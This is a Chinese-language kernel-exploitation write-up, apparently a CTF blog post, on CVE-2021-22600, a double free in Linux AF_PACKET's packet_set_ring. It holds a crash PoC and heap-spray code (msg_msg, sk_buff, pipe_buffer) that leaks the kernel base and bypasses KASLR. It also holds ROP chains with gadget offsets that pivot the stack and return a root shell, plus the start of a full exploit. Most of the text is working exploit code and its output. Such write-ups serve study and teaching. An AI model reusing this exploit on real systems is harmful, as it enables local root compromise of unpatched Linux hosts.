    rop_chain[rop_idx++] = kernel_offset + 0xffffffff81600df0+22; // SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
    rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
    rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
    rop_chain[rop_idx++] = get_root_shell;
    rop_chain[rop_idx++] = user_cs;
    rop_chain[rop_idx++] = user_rflags;
    rop_chain[rop_idx++] = user_sp;
    rop_chain[rop_idx++] = user_ss;

    /*
    <pt> 0xffffffff8109aaa9 push rsi
    <pt> 0xffffffff8109d984 push rsi
    <pt> 0xffffffff81155279 push rsi
    */

    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        *(uint64_t *)&primary_msg.mtext[0] = 0xffffffff81155279 + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET
        if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
            err_exit("failed to send primary msg!");

        /* The leaked ops address doubles as the marker searched for below. */
        *(uint64_t *)&secondary_msg.mtext[0] = pipe_ops_addr;
        if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
            err_exit("failed to send secondary msg!");

        if(i < PIPE_NUM){
            close(pipe_fd[i][0]);
            close(pipe_fd[i][1]);
        }
    }

    memset(data, 0, sizeof(data));
    *(int *)&data[0x0] = 0x400; /* overwrite chunk->key */
    *(int *)&data[0x10] = 0x400; /* overwrite user_key_payload->datalen */
    edit(0x400,data);

    res = key_read(key_id, data, 0x400);
    print_hex(data,sizeof(data));

    /*
     * Find the marker written into secondary_msg.mtext[0]. The qword five
     * slots (0x28 bytes) before it is read next, so the scan starts at slot 5
     * to keep that read inside data[].
     */
    index = -1;
    for (size_t i = 5; i < sizeof(data)/8; i++){
        if(*(uint64_t *)&data[i*8] == pipe_ops_addr){
            index = (int)(i*8);
            break;
        }
    }
    if(index == -1){
        err_exit("scan");
    }

    msg_addr = *(uint64_t *)&data[index-8*5];
    victim_addr = msg_addr + 0x30;
    printf("msg_addr: 0x%lx\n",msg_addr);
    printf("victim_addr: 0x%lx\n",victim_addr);

    /* Drain the secondary messages; the key is revoked half-way through. */
    for (int i = 0; i < MSG_QUEUE_NUM; i++){
        if (read_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
            err_exit("failed to receive secondary msg!");
        if(i == MSG_QUEUE_NUM/2){
            puts("free key");
            key_revoke(key_id);
            dele(3);
        }
    }

    puts("try to get UAF");
    for (int i = 0; i < PIPE_NUM*10; i++){
        if (pipe(pipe_fd[i]) < 0)
            err_exit("FAILED to spary pipe");
    }

    for (int i = 0; i < PIPE_NUM*10; i++){

        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 1) < 0){
            /* 1 * pipe_buffer = 0x30 kmalloc-64 */
            err_exit("fcntl");
        }
    }

    for (int i = 0; i < PIPE_NUM*10; i++){
        write(pipe_fd[i][1], "CCCCCCCC", 8); // tag
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], "CCCCCCCC", 8);
        write(pipe_fd[i][1], "BBBBBBBB", 8);
    }

    /* Forged pipe_buffer contents built from the leaked page and message addresses. */
    memset(data, 0, sizeof(data));
    *(uint64_t *)&data[0] = pipe_page_addr;
    *(uint64_t *)&data[0x8] = 0x2400000000;
    *(uint64_t *)&data[0x10] = victim_addr-8;
    *(uint64_t *)&data[0x18] = kernel_offset + 0xffffffff8102ccb5; // pop_rsp_ret
    *(uint64_t *)&data[0x20] = victim_addr+8;

    for (int i = 0xffff; i > 0; i--){
        edit(i,data);
    }
    sleep(1);

    printf("target_addr: 0x%lx\n",0xffffffff81155279 + kernel_offset);
    sleep(1);

    /* Closing the pipes is the final trigger. */
    for (int i = 0; i < PIPE_NUM*6; i++)
    {
        close(pipe_fd[i][0]);
        close(pipe_fd[i][1]);
    }

    return 0;
}
  • PS:kernelpwn.h 在之前的博客中展示过

CVE-2021-22600

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Sat Jun 3 16:53:03 PDT 2023
1
2
3
4
5
6
7
8
9
10
# Boot the challenge kernel and initramfs under QEMU with SMEP/SMAP, PTI and
# KASLR enabled; -s enables QEMU's gdb stub.
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1 -s
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
# Init script of the challenge initramfs.

# Mount the pseudo filesystems and populate /dev.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# The flag is owned by root and readable by its owner only.
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

# Turn on kptr_restrict and dmesg_restrict.
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

# Hand the player a shell running as uid 1000.
setsid /bin/cttyhack setuidgid 1000 /bin/sh

# Runs once that shell exits: unmount and power off.
umount /proc
umount /sys

poweroff -d 0 -f

内核源码下载:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目的漏洞是 CVE-2021-22600,该漏洞影响版本为:Linux Kernel v5.8.0 - v5.15.0

漏洞位于 /net/packet/af_packet.c 文件:在 TPACKET_V3 协议版本下,rx_owner_map(与 prb_bdqc.pkbdq 共用同一个联合体)引用了 pg_vec;在 packet_set_ring() 函数的末尾对 pg_vec 释放了一次,但并未将 rx_owner_map 指针置为 NULL

直到从 TPACKET_V3 协议版本切换到 TPACKET_V2 协议版本后,再次到达 packet_set_ring() 函数的末尾,bitmap_free() 函数对 rx_owner_map 指针进行释放,触发 double free 漏洞

核心函数 packet_set_ring 源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
/*
 * packet_set_ring() as quoted from net/packet/af_packet.c (vulnerable version).
 *
 * Installs or tears down the RX/TX ring of an AF_PACKET socket:
 *   - req->tp_block_nr != 0: validate the request and allocate a new pg_vec
 *     (plus an rx_owner_map bitmap for non-V3 RX rings);
 *   - req->tp_block_nr == 0: tear-down request, tp_frame_nr must also be 0.
 * The new state is then swapped into *rb under the locks, and whatever ends up
 * in the local pg_vec / rx_owner_map is freed at the end.
 *
 * Returns 0 on success or a negative errno (-EINVAL, -EBUSY, -ENOMEM).
 *
 * The annotations below follow the three PACKET_RX_RING calls made by the PoC.
 */
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err = -EINVAL;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) { /* in the PoC only the first PACKET_RX_RING call has a non-zero tp_block_nr and enters this branch */
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) /* note: tp_block_size must be PAGE_SIZE aligned */
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order); /* for a TPACKET_V3 RX ring, init_prb_bdqc() below then stores this pg_vec in rb->prb_bdqc.pkbdq */
if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) { /* RX ring only */
init_prb_bdqc(po, rb, pg_vec, req_u);
} else {
struct tpacket_req3 *req3 = &req_u->req3;

if (req3->tp_retire_blk_tov ||
req3->tp_sizeof_priv ||
req3->tp_feature_req_word) {
err = -EINVAL;
goto out_free_pg_vec;
}
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}
/* Done */
else {
err = -EINVAL;
if (unlikely(req->tp_frame_nr)) /* on the 2nd and 3rd PACKET_RX_RING calls tp_frame_nr must be 0, otherwise we bail out here */
goto out;
}

/* Detach socket from network */
spin_lock(&po->bind_lock);
was_running = po->running;
num = po->num;
if (was_running) {
po->num = 0;
__unregister_prot_hook(sk, false);
}
spin_unlock(&po->bind_lock);

synchronize_net();

err = -EBUSY;
mutex_lock(&po->pg_vec_lock);
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec); /*
1st PACKET_RX_RING call: the new pg_vec is installed, the local pg_vec becomes NULL and nothing is freed.
2nd PACKET_RX_RING call: the old pg_vec is swapped back out and freed below, leaving packet_ring_buffer->prb_bdqc->pkbdq dangling. */
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map); /*
Only reached on the 3rd PACKET_RX_RING call (after the switch to TPACKET_V2).
rx_owner_map and prb_bdqc share a union, so packet_ring_buffer->rx_owner_map has the same value as packet_ring_buffer->prb_bdqc->pkbdq.
The local rx_owner_map therefore receives the dangling pointer, and freeing it below is the double free. */
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
mutex_unlock(&po->pg_vec_lock);

spin_lock(&po->bind_lock);
if (was_running) {
po->num = num;
register_prot_hook(sk);
}
spin_unlock(&po->bind_lock);
if (pg_vec && (po->tp_version > TPACKET_V2)) {
/* Because we don't support block-based V3 on tx-ring */
if (!tx_ring)
prb_shutdown_retire_blk_timer(po, rb_queue);
}

out_free_pg_vec:
bitmap_free(rx_owner_map); /* frees rx_owner_map */
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr); /* frees pg_vec */
out:
return err;
}

其他次要部分源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Excerpt of init_prb_bdqc(): zeroes the ring's tpacket_kbdq_core and records
 * the freshly allocated pg_vec in it. The rest of the function is elided
 * ("......") by the article.
 */
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec; /* sock->rx_ring->prb_bdqc->pkbdq now references pg_vec -- the key step that makes the bug possible */
......
}
1
2
3
4
5
6
7
8
9
10
11
12
13
/* Excerpt of struct packet_ring_buffer; fields not relevant to the bug are elided ("......"). */
struct packet_ring_buffer {
struct pgv *pg_vec;
......
union { /* rx_owner_map and prb_bdqc are members of the same union */
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

/*
 * Excerpt of struct tpacket_kbdq_core. pkbdq is its first member, so inside
 * the union above it sits at the same address as rx_owner_map.
 */
struct tpacket_kbdq_core {
struct pgv *pkbdq;
......
};

下面是触发内核报错的 Poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PAGE_SIZE 0x1000

/*
 * Proof of concept that triggers the kernel BUG for CVE-2021-22600.
 *
 * Sequence: create an AF_PACKET socket, select TPACKET_V3, install an RX ring,
 * tear it down with an all-zero request, switch to TPACKET_V2, then send a
 * second all-zero PACKET_RX_RING request.
 *
 * save_status(), bind_core(), unshare_setup() and err_exit() come from
 * kernelpwn.h.
 */
int main(int argc , char **argv, char **envp)
{
    struct tpacket_req3 ring_req;
    int socket_fd, proto_version, rc;

    save_status();
    bind_core(0);
    unshare_setup();

    memset(&ring_req, 0, sizeof(ring_req));

    /* Create the AF_PACKET socket. */
    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
    }

    /* Select protocol version TPACKET_V3. */
    proto_version = TPACKET_V3;
    rc = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &proto_version, sizeof(proto_version));
    if (rc < 0) {
        err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
    }

    /* 1st PACKET_RX_RING: a regular request; the remaining fields are already zero. */
    ring_req.tp_block_size = 0x1000;
    ring_req.tp_block_nr = 0x410 / 8;
    ring_req.tp_frame_size = 0x1000;
    ring_req.tp_frame_nr = 0x410 / 8;
    rc = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &ring_req, sizeof(ring_req));
    if (rc < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }

    /* 2nd PACKET_RX_RING: every field, including tp_block_nr and tp_frame_nr, is zero. */
    memset(&ring_req, 0, sizeof(ring_req));
    rc = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &ring_req, sizeof(ring_req));
    if (rc < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }

    /* Switch the socket to TPACKET_V2. */
    proto_version = TPACKET_V2;
    rc = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &proto_version, sizeof(proto_version));
    if (rc < 0) {
        err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
    }

    /* 3rd PACKET_RX_RING: again an all-zero request (tp_block_nr must be 0). */
    memset(&ring_req, 0, sizeof(ring_req));
    rc = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &ring_req, sizeof(ring_req));
    if (rc < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }

    return 0;
}
1
2
3
4
5
6
7
/ $ ./exp
[*] Status has been saved.
[*] Process binded to core 0
[ 48.293367] kernel BUG at mm/slub.c:305!
[ 48.294485] invalid opcode: 0000 [#1] SMP PTI
[ 48.294770] CPU: 0 PID: 122 Comm: exp Not tainted 5.11.16 #1
[ 48.295009] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014

触发过程详解:

  • 第一次调用 setsockopt 设置 RX_RING:
    • 在执行 packet_set_ring 函数过程中,pg_vec 指向 alloc_pg_vec 函数分配的内存,并且调用 init_prb_bdqc 函数(导致 pg_vec 被 sock->rx_ring->prb_bdqc->pkbdq 引用)
    • 调用 swap 函数将 pg_vec 与 sock->rx_ring->pg_vec 交换,函数最后 pg_vec 指向 NULL,没有调用 free
  • 第二次调用 setsockopt 设置 RX_RING:
    • 调用 swap 函数将 pg_vec 与 sock->rx_ring->pg_vec 交换,此时 sock->rx_ring->pg_vec 为 NULL
    • pg_vec 指向上一步骤分配的内存,函数结尾调用 free_pg_vec 释放 pg_vec,此时 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针
  • 由于 sock->rx_ring->pg_vec 为 NULL,所以该套接字可以成功切换协议 TPACKET_V2
  • 第三次调用 setsockopt 设置 RX_RING:
    • 再次进入 packet_set_ring 函数,由于已经是 TPACKET_V2 协议,所以调用了 swap 函数交换了 rx_owner_map 与 sock->rx_ring->rx_owner_map
    • 由于 packet_ring_buffer 结构体的 rx_owner_map 成员和 prb_bdqc 成员属于联合体,所以 sock->rx_ring->rx_owner_map 与 sock->rx_ring->prb_bdqc->pkbdq 的值相同
    • 之前 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针,所以在函数结尾调用 bitmap_free(rx_owner_map),等同于 free 掉 sock->rx_ring->prb_bdqc->pkbdq 这个悬空指针,造成 double free

入侵思路

先泄露内核基地址以绕过 KASLR,由于这里有两次 free,因此我们选择使用 msg_msg + sk_buff 的方法进行泄露

构造消息队列,并分别在每一个消息队列上发送两条消息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if (i == 1024){
do_free_first(socket_fd);
}
}

do_free_second(socket_fd);
  • 内存布局如下:

1701342306217

  • 由于 slub 算法的特性,kmalloc-1k 会被分配到相邻的内存空间,kmalloc-96 会被分配到相邻的内存空间,两者互不干扰
  • msg_queue,primary,secondary 通过 primary_msg->m_list 和 secondary_msg->m_list 相关联

第一次堆喷:构造 UAF,堆喷 sk_buff 定位 victim 队列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
/* msg_msg->m_ts从'0x400-0x30'被改为'0x400' */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!"); /* 有一个sk_buff会命中UAF */

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
/* 因为msg_msg被修改导致peek_msg失败(利用这一点可以定位victim_qid) */
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");
  • 内存布局如下:

1701342638468

第二次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 primary_msg 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* msg_msg->m_ts从'0x400'被改为'0x1000-0x30' */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);
  • 内存布局如下:

1701342780014

  • 越界读取到相邻辅助消息的 secondary_msg->msg_msg,泄露对应 primary_msg 的地址

第三次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 UAF obj 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* msg_msg->next被改为nearby_msg->m_list.prev(泄露的primary_msg地址) */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);
  • 内存布局如下:

1701343615421

  • msg_msg data 的 0x1000-0x30 空间使用完毕后,程序就会根据 msg_msg->next 来确定 msg_msgseg data 的位置
  • msg_msg->next 修改为 primary_addr,就可以读取并泄露 primary->m_list.next ,也就是 secondary->msg_msg
  • 最后减去 0x400 就得到 victim_addr 了

第四次堆喷:堆喷 pipe_buffer,泄露内核基址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
   /* msg_msg->m_list被改为victim_addr(指向自身) */
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

/* read_msg会导致secondary_msg被释放 */
if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
/* 通过sk_buff读取pipe_buffer */
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);
  • 内存布局如下:

1701346455159

  • read_msg 没有设置 MSG_COPY,读取后便会从信息队列中释放 secondary_msg
  • 但是 sk_buff 中的指针并没有置空,导致 pipe_buffer 与 sk_buff 分配的区域在同一位置

接下来可以考虑伪造 pipe_buffer,构造 ROP,劫持 RIP,完成提权

1
2
3
4
5
6
pwndbg> p &init_cred
$1 = (struct cred *) 0xffffffff82889040 <init_cred>
pwndbg> p commit_creds
$2 = {int (struct cred *)} 0xffffffff810df150 <commit_creds>
pwndbg> p swapgs_restore_regs_and_return_to_usermode
$3 = {<text variable, no debug info>} 0xffffffff81e00fb0 <common_interrupt_return>

栈迁移的 gadget 有点难找,需要指令错位,但好在各个版本的内核都有这个 gadget:

1
2
3
4
5
6
7
8
.text:FFFFFFFF8130245D 8B 56 5C                      mov     edx, [rsi+5Ch]
.text:FFFFFFFF81302460 85 D2 test edx, edx
.text:FFFFFFFF81302462 0F 8E A0 00 00 00 jle loc_FFFFFFFF81302508
.text:FFFFFFFF81302462
.text:FFFFFFFF81302468 F0 FF 46 60 lock inc dword ptr [rsi+60h]
.text:FFFFFFFF8130246C 4C 8D 6B 0C lea r13, [rbx+0Ch]
.text:FFFFFFFF81302470 4C 89 EF mov rdi, r13 ; lock
.text:FFFFFFFF81302473 E8 E8 EE 9E 00 call _raw_spin_lock ; PIC mode

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

/* Array sizes used by main(): packet sockets, pipes and message queues. */
#define PG_NUM 256
#define PIPE_NUM 8
#define MSG_QUEUE_NUM 4096

/*
 * Size budget for each message: the mtext arrays are declared as
 * <size> - sizeof(struct msg_msg).
 * SECONDARY_MSG_SIZE is parenthesized so it evaluates correctly when used
 * inside a larger expression (e.g. SECONDARY_MSG_SIZE * 2).
 */
#define PRIMARY_MSG_SIZE 96
#define SECONDARY_MSG_SIZE (0x400-0x10)

/* mtype values for the different message kinds. */
#define PRIMARY_MSG_TYPE 0x31
#define SECONDARY_MSG_TYPE 0x32
#define VICTIM_MSG_TYPE 0x1337
#define OTHER_MSG_TYPE 0x33
/* Marker written at the start of every sprayed message body. */
#define MSG_TAG 0xAAAAAAAA

#define PAGE_SIZE 0x1000

/*
 * Create an AF_PACKET socket, switch it to TPACKET_V3 and install an RX ring
 * described by the arguments.
 *
 * block_size / block_nr : size and number of ring blocks
 * frame_size            : frame size; tp_frame_nr is derived as
 *                         (block_size * block_nr) / frame_size
 * sizeof_priv           : copied to tp_sizeof_priv
 * timeout               : copied to tp_retire_blk_tov
 *
 * Every failure is reported through err_exit(). Returns the socket fd.
 */
int do_alloc_pg_vec(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout){
    int proto_version = TPACKET_V3;
    int rc;

    int socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
    }

